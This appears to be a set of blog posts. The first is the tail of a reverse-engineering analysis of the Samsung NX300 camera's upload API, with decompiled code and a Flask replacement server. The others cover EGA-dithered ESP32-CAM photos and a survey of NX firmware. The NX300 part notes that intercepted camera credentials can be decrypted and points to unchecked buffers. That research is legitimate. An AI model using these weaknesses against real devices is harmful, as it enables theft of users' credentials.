The ErrCode and ErrSubCode are passed to the UI application, and probably processed according to some look-up tables / error code tables, which are subject to reverse engineering by somebody else. Valid error codes seem to be: 4019 ("invalid grant" from kakaostory), 8001, 9001, 9104.
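Since a replacement server has to produce responses that this pseudo-parser accepts verbatim (note the literal "Response SessionKey" lookup, space included), a rough Python imitation is useful for testing response templates before pointing a camera at them (a sketch, names are mine):

import re

def get_xml_string(buf: str, field: str):
    # mimic GetXmlString(): find the verbatim field name followed by
    # '="' or ':"', return everything up to the next double quote
    m = re.search(re.escape(field) + r'[=:]"([^"]*)"', buf)
    return m.group(1) if m else None

# example: the camera's view of our login response
# get_xml_string(response, "Response SessionKey")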

Logging out

The auth endpoint is also used for logging out from the camera (this feature is well-hidden: you need to switch the camera to "Wi-Fi" mode, enter the respective social network, and then press the 🗑 trash-bin key):

<Request Method="logout" SessionKey="pmlyFu8MJfAVs8ijyMli" CryptKey="ca02890e42c48943acdba4e782f8ac1f20caa249">
</Request>

Writing a minimal auth handler

For the positive case, a few elements need to be present in the response XML. A valid example for that is response-login.xml:

<Response SessionKey="{{ sessionkey }}">
<PersistKey Value="{{ persistkey }}"/>
<CryptSessionKey Value="{{ cryptsessionkey }}"/>
<LoginPeopleID="{{ screenname }}"/>
<OAuth URL="http://snsgw.samsungmobile.com/oauth"/>
</Response>

The camera will persist the SessionKey value and pass it to later requests. It will also remember the user as "logged in" and skip the /auth endpoint in the future. It is not yet clear how to reset that state from the API side to allow a new login (maybe it needs the right ErrCode value?).

A negative response would go along these lines:

<Response ErrCode="{{ errcode }}" ErrSubCode="{{ errsubcode }}" />

And here is the respective Flask handler PoC:

@app.route('/<string:site>/auth',methods = ['POST'])
def auth(site):
    xml = ET.fromstring(request.get_data())
    method = xml.attrib["Method"]
    if method == 'logout':
        return "Logged out for real!"
    keyspec, user, password = decrypt_credentials(xml)
    # TODO: check credentials
    return render_template('response-login.xml',
        sessionkey=mangle_address(user),
        screenname="Samsung NX Lover")

Uploading pictures

After a successful login, the camera will actually start uploading files with WebUploadImage(). For each file, either the /facebook/photo or the /facebook/video endpoint is called with another XML request, followed by an HTTP PUT of the actual content.

bool WebUploadImage(int ui_ctx,int site_idx,int picType) {
    if (site_idx == /*14*/ SITE_KAKAOSTORY) {
        /* snip very long block handling kakaostory */
        return true;
    }
    /* iterate over all files selected for upload */
    for (int i = 0; i < gWeb.selected_count; i++) {
        gWeb.file_path = upload_file_names[i];
        gWeb.index = i+1;
        char *buf = malloc(2048);
        WebMakeUploadingMetaData(buf,site_idx);
        WebOperateMetaDataUpload(site_idx,0,buf);
        WebOperateUpload(0,picType);
    }
    return true;
}

Upload request: WebOperateMetaDataUpload()

The image metadata is prepared by WebMakeUploadingMetaData() and sent by WebOperateMetaDataUpload(). The (user-editable) facebook folder name is properly XML-escaped:

bool WebMakeUploadingMetaData(char *out_http_request,int site_idx) {
    /* snip hostname selection similar to WebMakeLoginData */
    if (strstr(gWeb.file_path, "JPG") != NULL) {
        WebParseFileName(gWeb.file_path,gWeb.file_name);
        /* "authenticate" the request by SHA1'ing some static secrets */
        char header_for_sig[256];
        sprintf(header_for_sig,"/%s/photo.upload*%s#%s:%s",gWeb.site,
            gWeb.persist_key,gWeb.response_session_key,gWeb.keyspec);
        char *crypt_key = sha1str(header_for_sig);
        body = WebMalloc(2048);
        WebString_Add_fmt(body,"%s%s","<?xml version=\"1.0\" encoding=\"UTF-8\"?>","\r\n");
        WebString_Add_fmt(body,"%s%s%s%s%s",
                "<Request Method=\"upload\" Timeout=\"3000\" SessionKey=\"",
                gWeb.response_session_key,"\" CryptKey=\"",crypt_key,"\">\r\n");
        WebString_Add_fmt(body,"%s%s","<Photo>","\r\n");
        if (site_idx == /*1*/ SITE_FACEBOOK) {
            char *folder = xml_escape(gWeb.facebook_folder);
            WebString_Add_fmt(body,"%s%s%s","<Album ID=\"\" Name=\"",folder,"\"/>\r\n");
        } else
            WebString_Add_fmt(body,"%s%s%s","<Album ID=\"\" Name=\"","Samsung Smart Camera","\"/>\r\n");
        WebString_Add_fmt(body,"%s%s%s%s","<File Name=\"",gWeb.file_name,"\"/>","\r\n");
        if (site_idx != /*9*/ SITE_WEIBO) {
            WebString_Add_fmt(body,"%s%s%s%s","<Content><![CDATA[",gWeb.description,"]]></Content>","\r\n");
        }
        WebString_Add_fmt(body,"%s%s","</Photo>","\r\n");
        WebString_Add_fmt(body,"%s%s","</Request>","\r\n");

        body_len = strlen(body);
        WebString_Add_fmt(header,"%s%s%s%s","POST /",gWeb.site,"/photo HTTP/1.1","\r\n");
        WebString_Add_fmt(header,"%s%s%s","Host: ",hostname,"\r\n");
        WebString_Add_fmt(header,"%s%s","Content-Type: text/xml;charset=utf-8","\r\n");
        WebString_Add_fmt(header,"%s%s%s","User-Agent: ","DI-NX300","\r\n");
        WebString_Add_fmt(header,"%s%d%s","Content-Length: ",body_len,"\r\n\r\n");
        strcat(header,body);
        strcpy(out_http_request,header);
        return true;
    }
    if (strstr(gWeb.file_path, "MP4") != NULL) {
        /* analogous to picture upload, but for video */
    } else
        return false; /* wrong file type */
}

bool WebOperateMetaDataUpload(int site_idx,int sock_idx,char *buf) {
    /* snip hostname selection similar to WebMakeLoginData */
    bool result = WebSocketConnect(sock_idx,hostname,80);
    if (result) {
        SendTCPSocket(sock_idx,buf,strlen(buf),0,false,0,0);
        response = malloc(2048);
        ReceiveTCPProcess(sock_idx,response,300);
        return WebCheckRequest(response);
    }
    return false;
}

The generated XML looks like this:

<?xml version="1.0" encoding="UTF-8"?>
<Request Method="upload" Timeout="3000" SessionKey="deadbeef" CryptKey="4f69e3590858b5026508b241612a140e2e60042b">
<Photo>
<Album ID="" Name="Samsung Smart Camera"/>
<File Name="SAM_9838.JPG"/>
<Content><![CDATA[Upload test message.]]></Content>
</Photo>
</Request>
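The CryptKey gives the server a way to check request integrity, so a reimplementation can verify it by mirroring the sha1 construction from WebMakeUploadingMetaData() above (a sketch; the values must match whatever the /auth response handed out):

import hashlib

def expected_cryptkey(site, persist_key, session_key, keyspec):
    # same format string as the camera's header_for_sig sprintf()
    msg = "/%s/photo.upload*%s#%s:%s" % (site, persist_key, session_key, keyspec)
    return hashlib.sha1(msg.encode()).hexdigest()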

Upload response: WebCheckRequest()

The server response is checked by WebCheckRequest():

bool WebCheckRequest(char *xml) {
    /* check for HTTP 200 OK, populate ErrCode and ErrSubCode on error */
    if (!GetXmlResult(xml))
        return false;
    memset(web->HostAddr,0,64); /* 64 byte buffer */
    memset(web->ResourceID,0,128); /* 128 byte buffer */
    GetXmlString(xml,"HostAddr",web->HostAddr);
    GetXmlString(xml,"ResourceID",web->ResourceID);
    return true;
}

Thus the server needs to return an (arbitrary) XML element that has the two attributes HostAddr and ResourceID, which are stored in the gWeb struct for later use. As always, there are no range checks (but those fields are in the middle of the struct, so maybe not the best place to smash).

Actual media upload: WebOperateUpload()

The code is pretty straightforward: it creates a buffer with the (downscaled or original) media file, makes an HTTP PUT request to the host and resource obtained earlier, and submits that to the server:

bool WebOperateUpload(int sock_idx,ulong picType) {
    char hostname[128];
    memset(hostname,0,128);
    WebParseIP(gWeb.HostAddr,hostname); /* not required to be an IP */
    int port = WebParsePort(gWeb.HostAddr);
    if (!WebSocketConnect(sock_idx,hostname,port))
        return false;
    char *file_buffer_ptr;
    int file_size;
    char *request = WebMalloc(2048);
    WebMakeUploadingData(request,&file_buffer_ptr,&file_size,picType);
    if (WebUploadingData(sock_idx,request,file_buffer_ptr,file_size)) {
        if (strstr(gWeb.file_path,"JPG") || strstr(gWeb.file_path, "MP4"))
            WebFree(file_buffer_ptr);
        WebSocketClose(sock_idx);
    }
}

bool WebMakeUploadingData(char *out_http_request,char **file_buffer_ptr,int *file_size_ptr,ulong picType) {
    request = WebMalloc(512);
    if (strstr(gWeb.file_path,"JPG")) {
        /* scale down or send original image */
        if (picType == 0) {
            int megapixels = 2;
            if (strcmp(gWeb.site, "facebook") == 0)
                megapixels = 1;
            NASLWifi_jpegResizeInMemory(gWeb.file_path,megapixels,file_buffer_ptr,file_size_ptr);
        } else
            NPL_GetFileBuffer(gWeb.file_path,file_buffer_ptr,file_size_ptr);
    } else if (strstr(gWeb.file_path,"MP4")) {
        NPL_GetFileBuffer(gWeb.file_path,file_buffer_ptr,file_size_ptr);
    }
    WebString_Add_fmt(request,"%s%s%s%s","PUT /",gWeb.ResourceID," HTTP/1.1","\r\n");
    if (strstr(gWeb.file_path,"JPG")) {
        WebString_Add_fmt(request,"%s%s","Content-Type: image/jpeg","\r\n");
    } else if (strstr(gWeb.file_path,"MP4")) {
        /* copy-paste-fail? should be video... */
        WebString_Add_fmt(request,"%s%s","Content-Type: image/jpeg","\r\n");
    }
    WebString_Add_fmt(request,"%s%d%s","Content-Length: ",*file_size_ptr,"\r\n");
    WebString_Add_fmt(request,"%s%s%s","User-Agent: ","DI-NX300","\r\n");
    WebString_Add_fmt(request,"%s%d/%d%s","Content-Range: bytes 0-",*file_size_ptr - 1,
            *file_size_ptr,"\r\n");
    WebString_Add_fmt(request,"%s%s%s","Host: ",gWeb.HostAddr,"\r\n\r\n");
    strcpy(out_http_request,request);
}

The actual upload function WebUploadingData() operates in a straightforward way: it sends the request buffer and the file buffer, then checks for an HTTP 200 OK response or for the presence of ErrCode and ErrSubCode.

Writing an upload handler

We need to implement a /<site>/photo handler that returns an (arbitrary) upload path and a PUT handler that will process files on that path.

The upload path will be served using this XML (the hostname is hardcoded because we already had to hijack the snsgw hostname anyway):

<Response HostAddr="snsgw.samsungmobile.com:80" ResourceID="upload/{{ sessionkey }}/{{ filename }}" />

Then we have the two API endpoints:

@app.route('/<string:site>/photo',methods = ['POST'])
def photo(site):
    xml = ET.fromstring(request.get_data())
    # TODO: check session key
    sessionkey = xml.attrib["SessionKey"]
    photo = xml.find("Photo")
    filename = photo.find("File").attrib["Name"]
    # we just pass the sessionkey into the upload URL
    return render_template('response-upload.xml', sessionkey=sessionkey, filename=filename)

@app.route('/upload/<string:sessionkey>/<string:filename>', methods = ['PUT'])
def upload(sessionkey, filename):
    d = request.get_data()
    # TODO: check session key
    store = os.path.join(app.config['UPLOAD_FOLDER'], secure_filename(sessionkey))
    os.makedirs(store, exist_ok = True)
    fn = os.path.join(store, secure_filename(filename))
    with open(fn, "wb") as f:
        f.write(d)
    return "Success!"

Conclusion

Samsung implemented this service back in 2009, when mandatory SSL (or TLS) wasn't a thing yet. They showed intent to properly secure users' credentials by applying state-of-the-art symmetric and asymmetric encryption instead. However, the insecure (commented out?) random key generation algorithm was not suitable for the task, and even if it were, the secret key was provided as part of the message anyway. A passive attacker listening to the traffic between Samsung cameras and their API servers was able to obtain the AES key and thus decrypt the user credentials.

In this post, we have analyzed the client-side code of the NX300 camera, and re-created the APIs as part of the samsung-nx-emailservice project.


Comments on HN

Posted 2023-12-01 17:02

This post is about shooting 16-color EGA (1984) styled retro photos right on the $4 ESP32-CAM board and storing them to µSD in the arcane TGA (1984) file format.

For that, we need to read RGB images, convert them to 16 colors, apply dithering, and store a TGA image file.

ESP32-EGA16-TGA source code on GitHub.

Test-photo Bayer-dithered to EGA colors, with shifted matrices

Introduction

This year's Shitty Camera Challenge has some space for digital cameras, and so the author experimented with different devices. The last one, the ESP32-CAM, was obtained after the HomeAssistant setup wizard promised an easy way to monitor analog utility meters with camera and AI, and what could be shittier than a $4 camera PCB?

ESP32-CAM

The ESP32-CAM turned out to be even shittier than anticipated. Of the four sensors ordered, three had visible defects. The image quality is green. The board pinout is ridiculous, with the LED flash wired to the SD data line, the PCB LED blocking WiFi, and no fully usable GPIOs.

Still, the ESP32 is quite a beefy beast for an embedded SoC, with a 240MHz 32-bit core and ~500KB of SRAM on die, plus some 4MB of PSRAM on the board to store camera pictures. The pictures can be streamed over WiFi or stored to a µSD card, giving us some flexibility.

The CPU and memory specs are far beyond 1980s desktop computers, so we are not limited in the choice of algorithms to perform our task, and we can easily cheat where needed.

The platform is supported by Arduino IDE and by PlatformIO, typically programmed in C/C++, and there are example projects to implement a webcam or to take pictures to µSD.

Reading RGB data from the sensor into memory

The camera API supports various streaming formats, from pre-compressed JPEG to RAW:

typedef enum {
    PIXFORMAT_RGB565,    // 2BPP/RGB565
    PIXFORMAT_YUV422,    // 2BPP/YUV422
    PIXFORMAT_YUV420,    // 1.5BPP/YUV420
    PIXFORMAT_GRAYSCALE, // 1BPP/GRAYSCALE
    PIXFORMAT_JPEG,      // JPEG/COMPRESSED
    PIXFORMAT_RGB888,    // 3BPP/RGB888
    PIXFORMAT_RAW,       // RAW
    PIXFORMAT_RGB444,    // 3BP2P/RGB444
    PIXFORMAT_RGB555,    // 3BP2P/RGB555
} pixformat_t;

The easiest format for us to process is RGB888, with one byte for each of the three colors, stored in a two-dimensional pixel array. Except when the API is a lie:

E (1195) esp32 ll_cam: Requested format is not supported

Luckily, the github-actions bot closed the issue as completed, so it's solved, right? RIGHT??? The error message comes from ll_cam_set_sample_mode() and its source code reveals that the actually implemented options are:

  • PIXFORMAT_GRAYSCALE
  • PIXFORMAT_YUV422
  • PIXFORMAT_JPEG
  • PIXFORMAT_RGB565

Greyscale gives us one brightness byte per pixel, but we want to have colors. YUV422 stores two pixels in four bytes and requires a color space conversion. JPEG requires that as well, but only after parsing and uncompressing the JPEG file. RGB565 stores one pixel in two bytes, with five bits for red and blue, respectively, and six bits for green. That gives us enough headroom to do some dithering for a 16-color palette and spares us from non-linear luminance and chrominance formulas.

Furthermore, RGB565 can be converted to RGB888 with just a bit of bit shifting, so there we go. We configure the camera to take images in QVGA (320x240, close enough to the EGA 320x200 original) into PSRAM:

camera_config_t config;
/* ... snip boilerplate ... */
config.pixel_format = PIXFORMAT_RGB565;
config.frame_size = FRAMESIZE_QVGA;
config.fb_location = CAMERA_FB_IN_PSRAM;
esp_camera_init(&config);

However, after firing up the image sensor and taking a shot, we realize that everything is green. Not monochrome green, but bad-white-balance green. The suggested workaround is to give the camera some time to calibrate after enabling auto white balance, by taking and discarding a few shots:

sensor_t *s = esp_camera_sensor_get();
/* Enable AWB and AWB gain in auto mode */
s->set_whitebal(s, 1);
s->set_awb_gain(s, 1);
s->set_wb_mode(s, 0);
/* DO NOT COPY THIS! Set contrast and saturation to max for the EGA effect */
s->set_contrast(s, 2);
s->set_saturation(s, 2);
/* Take and discard a few pictures */
for (int i= 0 ; i < WARMUP_PICS; i++) {
  camera_fb_t *fb = esp_camera_fb_get();
  if (fb)
    esp_camera_fb_return(fb);
}

After that (with WARMUP_PICS=10), the image is less green. Not quite true-color, but acceptable. The raw RGB565 image bytes (320*240*2 = 153600 of them) can be found in fb->buf:

Test photo in RGB565 colors

As noted above, the image is 320*240 and not 320*200, as the EGA card didn't have square pixels. We can compensate for that by simply skipping one of every six rows when converting. Then we can fix the aspect ratio in post-production for modern PC displays by scaling up to 200%x240%.

Interlude: viewing RGB565 images

An obvious intermediate step when developing a camera application is storing the "raw" or "intermediate" pixel arrays right to "disk", i.e. the µSD card.

RGB888 images can be trivially converted (and scaled up for modern displays) by ImageMagick, the author's favorite image processing CLI:

convert -depth 8 -size 320x240 input.rgb -scale 200% output.png

There is no direct driver for RGB565, but there is this RGB565 parser pattern, and it leaves the author speechless. WTF. ImageMagick is the Swiss army knife of image processing, but is this Turing complete?!?

So maybe the second favorite image processing tool has something in the pipeline? Oh yes indeed:

ffmpeg -vcodec rawvideo -f rawvideo -pix_fmt rgb565be -s 320x240 -i input.rgb565 -f image2 -vcodec png output.png

Et voila! We can store intermediate pictures, test individual phases of the pipeline and see where things go wrong. The ESP32 µSD interface is quite slow, so storing the "huge" 150KiB and 225KiB images takes a second or so of intensive flash LED blinking. And that LED gets rather hot, so watch out for your fingers!
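A few lines of Python with Pillow can do the same conversion, in case neither tool is at hand (a host-side sketch, assuming the big-endian byte order from the ffmpeg line above):

#!/usr/bin/env python3
# usage: rgb565topng.py input.rgb565 output.png
from PIL import Image
import sys

W, H = 320, 240
raw = open(sys.argv[1], "rb").read()
img = Image.new("RGB", (W, H))
for i in range(W * H):
    v = (raw[2*i] << 8) | raw[2*i + 1]                # big-endian RGB565
    r, g, b = (v >> 11) & 0x1F, (v >> 5) & 0x3F, v & 0x1F
    img.putpixel((i % W, i // W),                     # replicate top bits to 8 bits
                 ((r << 3) | (r >> 2), (g << 2) | (g >> 4), (b << 3) | (b >> 2)))
img.save(sys.argv[2])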

EGA 16-color palette

The EGA color palette was a natural choice for this experiment, because its 16 colors are well known and still in use today in terminal-mode applications (including most things you can access through SSH). While they don't go back to Roman horse asses or 1920s punch cards, they were created by IBM in 1981 for the CGA adapter, based on a simple one-bit-per-color scheme plus one intensity bit, and an analog hardware hack to replace the ugly yellow ocher with a slightly less unpleasant brown.

The result is the following set of natural colors beloved by retro pixel artists, perfectly suited for photography:

0 #000000 1 #0000AA 2 #00AA00 3 #00AAAA 4 #AA0000 5 #AA00AA 6 #AA5500 7 #AAAAAA
8 #555555 9 #5555FF 10 #55FF55 11 #55FFFF 12 #FF5555 13 #FF55FF 14 #FFFF55 15 #FFFFFF

Technically, the full EGA color palette has two bits per color, resulting in 64 total colors, but you can only ever choose 16 of them, and as the defaults are well-known, we are sticking to them.

To provide the best resulting image quality, for each pixel we will pick the closest EGA color, by minimizing the Euclidean distance in three-dimensional space, or in different words, we'll calculate the squared differences for each color channel and pick the smallest one:

for (int i = 0; i < 16; i++) {
  int delta_r = abs(EGA_PALETTE[i][0]-r);
  int delta_g = abs(EGA_PALETTE[i][1]-g);
  int delta_b = abs(EGA_PALETTE[i][2]-b);
  int match = delta_r*delta_r + delta_g*delta_g + delta_b*delta_b;
  if (match < best_match) {
      best_match = match;
      best_color = i;
  }
}

We could implement a fancy look-up-table for each of the 65536 possible RGB565 values, but we have plenty of CPU cycles and not so much RAM, and only 64000 pixels, so we just do the look-up for each of them.

Test-photo mapped directly to EGA colors

The results look surprisingly monochrome, with just a few colored areas. It turns out that the low saturation of the ESP camera sensor maps most real-world subjects onto the four shades of grey when using the "closest color" approach. To increase the saturation, we'd have to convert our pixels into another colorspace, so let's look for a different approach.

Dithering of photos to 16 colors

The standard (old-school) technique to map natural colors to a limited palette is color dithering. There are different algorithms, with different trade-offs, resulting in different image quality.

The simplest one, average dithering, assigns the closest palette color to each pixel, and we've seen it in action above.

Floyd-Steinberg from 1975 is the most sophisticated one, giving the most natural results and having a nice natural and irregular pixel distribution. It works by taking the error (difference between the original color and the mapped palette color) of each pixel, and spreading ("propagating") that error out to the neighbor pixels below and to the right. This creates a statistical distribution of colored pixels proportional to the level of the respective color in the image. The algorithm is clever by only applying the propagation to pixels right and below of the current one, allowing to process an image in a single linear pass.

However, that means we would need to change pixel values one row ahead in our buffer, and adding something to a pixel's color might overflow it, so we need to clip values to the (0, 31) or (0, 63) range. Instead, we can get a very good approximation by only propagating the error to the next pixel in the current row, with much less work:

Test-photo error-dithered to EGA colors

There are slightly noticeable vertical line artifacts at the left edge, as we reset the error variables at the beginning of each row (otherwise, colors from the right edge would "bleed over"); they wouldn't be there with the two-dimensional approach of Floyd-Steinberg. Beyond that, this is already too good and almost too true-color to really count as a shitty image.
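In Python terms, the simplified one-row error propagation boils down to something like this (a sketch with names of my choosing, using the same closest-color search as in the previous section, here on 8-bit values):

# palette is a list of (r, g, b) tuples, row a list of RGB888 pixels
def closest_color(palette, rgb):
    return min(range(len(palette)),
               key=lambda i: sum((p - c) ** 2 for p, c in zip(palette[i], rgb)))

def dither_row(row, palette):
    err = (0, 0, 0)  # reset per row so errors don't bleed across the edge
    out = []
    for pixel in row:
        r, g, b = (max(0, min(255, c + e)) for c, e in zip(pixel, err))
        idx = closest_color(palette, (r, g, b))
        pr, pg, pb = palette[idx]
        err = (r - pr, g - pg, b - pb)  # carry the error to the next pixel
        out.append(idx)
    return out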

There is one approach that was easier to implement on 1980s hardware (and that allowed better compression of the images), and that is ordered (or Bayer) dithering. It uses a (most often square) threshold table that is tiled repeatedly across the image, changing the respective colors and resulting in a visible cross-hatch pattern.

By simply taking a bayer pattern table from StackOverflow, and doubling the threshold values to compensate for the pale camera colors, we get this:

Test-photo Bayer-dithered to EGA colors

Now why is this so monochrome again? Well, the Bayer pattern is applied individually to each of the three color channels, and we are using the same pattern position for the three channels of a pixel, so effectively we always apply a greyscale threshold. By simply shifting the pattern one pixel to the right for green and one pixel down for blue, we get a much better result:

Test-photo Bayer-dithered to EGA colors, with shifted matrices

Perfect! That's exactly the desired image quality to compete in the Shitty Camera Challenge!
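Condensed into a Python sketch, the per-channel matrix shift looks like this (BAYER4 is a standard 4x4 Bayer matrix like the StackOverflow one; the doubling is the compensation for the pale camera colors mentioned above):

# rough sketch of the shifted ordered dithering; returns the threshold
# against which a channel value (0..255) is compared
BAYER4 = [[ 0,  8,  2, 10],
          [12,  4, 14,  6],
          [ 3, 11,  1,  9],
          [15,  7, 13,  5]]

SHIFT = [(0, 0), (1, 0), (0, 1)]  # red unshifted, green +x, blue +y

def threshold(x, y, channel):
    dx, dy = SHIFT[channel]
    t = BAYER4[(y + dy) % 4][(x + dx) % 4] * 16  # map 0..15 onto 0..255
    return t * 2  # doubled to compensate for the pale camera colors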

Saving as TGA

Actually, TGA wasn't the first choice format for this project. The author's favorite is PCX (1985), which is only slightly younger than TGA, but was supported by the author's favorite image editing tool, that also featured the most creative versioning scheme: Deluxe Paint II Enhanced 2.0.

However, the author's favorite image viewer, Geeqie, fails to properly display PCX files, and fixing that was way out-of-scope for this project, or so the author thought. So we stick to TGA, which seems to be properly supported based on throwing a few test files at it.

The file format is simple when compression is disabled, coming with a small 18-byte header followed by the palette (in BGR order, not RGB), and then the packed raw pixel data, from bottom to top.

Well, in theory TGA supports various color depths and palette types from 1 bit per pixel to RGBA. What we have is a 16-color 4bpp (4 bits per pixel; not to be confused with the "BPP" bytes-per-pixel used in the ESP32 headers) image with a 16*3-byte palette. However, the image processing tools that claim to "support" TGA don't actually accept arbitrary variants.

Screenshot of a GIMP error message not accepting my TarGA format

So we have to artificially inflate our pixel data from 4bpp to 8bpp, and because the tools will also ignore the "number of colors in the palette" field and instead use the "number of colors in the image" field, we need to store a full 256-color palette in the file, of which we will only use the first 16 entries:

memcpy(tga, &header, sizeof(TgaHeader));
for (int i = 0; i < STORE_COLORS; i++) {
  tga[sizeof(TgaHeader) + i*3 + 0] = EGA_PALETTE[i % COLORS][2];
  tga[sizeof(TgaHeader) + i*3 + 1] = EGA_PALETTE[i % COLORS][1];
  tga[sizeof(TgaHeader) + i*3 + 2] = EGA_PALETTE[i % COLORS][0];
}
for (y = 0; y < HEIGHT; y++) {
  src_pos = y*WIDTH;
  dst_pos = (HEIGHT - y - 1)*WIDTH;
  memcpy(tga + sizeof(TgaHeader) + 3*256 + dst_pos, framebuffer + src_pos, WIDTH);
}
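For reference, the same file layout can be produced host-side with a few lines of Python (a sketch following the description above: 18-byte header for an uncompressed color-mapped image, a 256-entry BGR palette, and 8bpp rows stored bottom-to-top):

import struct

def write_tga(path, width, height, palette, pixels):
    # 18-byte header: type 1 = uncompressed, color-mapped, 8 bits per pixel
    header = struct.pack("<BBBHHBHHHHBB",
                         0, 1, 1,      # no image ID, palette present, type 1
                         0, 256, 24,   # palette: first index, entry count, bits per entry
                         0, 0,         # x/y origin
                         width, height,
                         8, 0)         # 8bpp, descriptor 0 = bottom-to-top
    with open(path, "wb") as f:
        f.write(header)
        for i in range(256):           # inflate the 16-color palette to 256 entries
            r, g, b = palette[i % len(palette)]
            f.write(bytes((b, g, r)))  # BGR order, as noted above
        for y in range(height - 1, -1, -1):
            f.write(bytes(pixels[y * width:(y + 1) * width]))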

The remaining code of the project is based on existing examples. Find the full ESP32-EGA16-TGA source code on GitHub. Beware, it's as shitty as everything shown above, to fit into the project. This is not production-quality C code.

Comments on HN

Posted 2023-08-04 18:07

Many years ago, in the summer of 2014, I fell into the rabbit hole of the Samsung NX(300) mirrorless APS-C camera, found out it runs Tizen Linux, analyzed its WiFi connection, got a root shell and looked at adding features.

The next year, Samsung "quickly adapted to market demands" and abandoned the whole NX ecosystem, but I'm still an active user of the NX500 and the NX mini (for infrared photography). A few months ago, I was triggered to find out which framework is powering each of the 19(!!!) NX models that Samsung released between 2010 and 2015. The TL;DR results are documented in the Samsung NX model table, and this post contains more than you ever wanted to know, unless you are a Samsung camera engineer.

Hardware Overview

There is a Wikipedia list of all the released NX models that I took as my starting point. The main product line is centered around the NX mount, and the cameras have an "NXnnnn" numbering scheme, with "nnnn" being a number of one to four digits.

In addition, there is the Galaxy NX, which is an Android phone, but also has the NX mount and a DRIM engine DSP. This fascinating half-smartphone half-camera line began in 2012 with the Galaxy Camera and featured a few Android models with zoom lenses and different camera DSPs.

In 2014, Samsung introduced the NX mini with a 1" sensor and the "NX-M" lens mount, sharing much of the architecture with the larger NX models. In 2015, they accidentally leaked the NX mini 2, based on the DRIMeV SoC and running Linux, and even submitted it to the FCC, but it never materialized on the market after Samsung "shifted priorities". If you are the janitor in Samsung's R&D offices and you know where all the NX mini 2 prototypes are locked up, or if you were involved in making them, I'd die to get my hands on one of them!

Most of the NX cameras are built around different generations of the "DRIM engine" image processor, so it's worth looking at that as well.

The Ukrainian company photo-parts has a rather extensive list of NX model boards, even featuring a few well-made PCB photographs. While their page is quirky, the documentation is excellent and matches my findings. They have documented the DRIMe CPU generation for many, but not for all, NX cameras.

Origins of the DRIM engine

Samsung NV100 (*)

Apparently the first cameras introducing the DRIM engine ("Digital Real Image & Movie Engine") were the NV30/NV40 in 2008. Going through the service manuals of the NV cameras reveals the following:

  • NV30 (the Samsung camera, not the Samsung laptop with the same model number): using the Milbeaut MB91686 image processor introduced in 2006
  • NV40: also using the MB91686
  • NV24: "TWE (MB91043)"
  • NV100 (also called TL34HD in some regions): "DRIM II (MB91043)"

There are also some WB* camera models built around Milbeaut SoCs:

  • WB200, WB250F, WB30F, WB800F: MB91696 (the SoC has "MB91696B" on it, the service manual claims "MB91696AM / M6M2-J"), firmware strings confirm "M6M2J"

It looks like the DRIM engine is a re-branded Milbeaut MB91686, and the DRIM engine II is an MB91043. Unfortunately, nothing public is known about the latter, and it doesn't look like anybody ever talked about this processor model.

Even more unfortunately, I wasn't able to find a (still working) firmware download for any of those cameras.

Firmware Downloads

Luckily, the firmware situation is better for the NX cameras. To find out more about each of them, I visited the respective Samsung support page and downloaded the latest firmware release. For the Android-based cameras, however, firmware images are only available through shady "Samsung fan club" sites.

The first classification was provided by the firmware size, as there were distinct buckets. The first generation, NX5, NX10, and NX11 had (unzipped) sizes of ~15MB, the last generation NX1 and NX500 were beyond 350MB.

Googling for the respective NX and "DRIM engine" press releases, PCB photos and other related materials helped identify the specific generation. Sometimes, there were no press releases mentioning the SoC, and I had to resort to PCB photos found online or made by myself or other NX enthusiasts.

Further information was obtained by checking the firmware files with strings and binwalk, with the details documented below.

Note: most firmware files contain debug strings and file paths, often mentioning the account name of the respective developer. Personal names of Samsung developers are masked out in this blog post to protect the guilty (err, innocent).

Mirrorless Cameras

DRIMeII: NX10, NX5, NX11, NX100

Samsung NX10 (*)

The first NX camera released by Samsung was the NX10, so let's look into its firmware. The ZIP contains an nx10.bin, and running that through strings -n 20 still yields some 11K unique entries.

There are no matches for "DRIM", but searching for "version", "revision", and "copyright" yields a few red herrings:

* Powered by [redacted] in DSLR team *
* This version apadpter for NX10 (16MB NOR) *
* Ice Updater v 0.025 (Base on FW Updater) *
* Hermes Firmware Version 0.00.001 (hit Enter for debugger prompt)       *
*                COPYRIGHT(c) 2008 SYRI                                  *

It's barely possible to find out the details of those names after over a decade, and we still don't know which OS is powering the CPU.

One hint is provided by the source code reference in the binary: D:\070628_view\NX10_DEV_MAIN\DSLR_PRODUCT\DSP\Project\CSP\..\..\Source\System\CSP\CSP_1.1_Gender\CSP_1.1\uITRON\Include\PCAlarm.h

This seems to be based on a "CSP", and feature "uITRON". The former might be the Samsung Core Software Platform, as identified by the following copyright notice in the firmware file:

Copyright (C) SAMSUNG Electronics Co.,Ltd.
SAMSUNG (R) Core SW Platform 2.0 for CSP 1.1

The latter is µITRON, a Japanese real-time OS specification going back to 1984. So let's assume the first camera generation (everything released in 2010) is powered by µITRON, as NX5, NX10 and NX11 have the same strings in their firmware files.

Samsung NX100 (*)

The NX100 is very similar to the above devices, but its firmware is roughly twice the size, given that it has a 32MB NOR flash (according to the bootloader strings). However, there are only 19MB of non-0x00, non-0xff data, and from comparing the extracted strings no significant new modules could be identified.

None of them identify the DRIM engine generation, but the NX10 service manual labels the CPU as "DSP (DRIMeII Pro)", so probably related to but slightly better than NV100's "DRIM II MB91043". Furthermore, all of these models are documented as "DRIM II" by photo-parts, and there is a well-readable PCB shot of the NX100 saying "DRIM engine IIP".

DRIMeIII: NX200, NX20, NX210, NX1000, NX1100

Samsung NX200 (*)

One year later, in 2011, Samsung released the NX200 powered by the DRIM (engine) III. It was followed in 2012 by the NX20, NX210, and NX1000/NX1100 (the only difference between the last two is a bundled Adobe Lightroom). The NX20 emphasizes professionalism, while the NX1x00 and NX2x0 stand for compact mobility.

The NX200 firmware also makes a significant leap to 77MB uncompressed, and the following models clock in at around 102MB uncompressed.

Each of the firmware ZIPs contains two files, named after the model, e.g. nx200.Rom and nx200.bin. Binwalking the Rom doesn't yield anything of value, except roughly a dozen artistic collage background pictures. strings confirms that it is some sort of filesystem not identified by binwalk (and it contains a classical music compilation, with tracks titled "01_Flohwalzer.mp3" to "20_Spring.mp3", each roughly a minute long, sounding like ringtones from the 2000s)! The pictures and music files can be extracted using PhotoRec.

Binwalking the bin yields a few interesting strings, though:

8738896       0x855850        Unix path: /opt/windRiver6.6/vxworks-6.6/target/config/comps/src/edrStub.c
...
10172580      0x9B38A4        Copyright string: "Copyright (C) 2011, Arcsoft Inc."
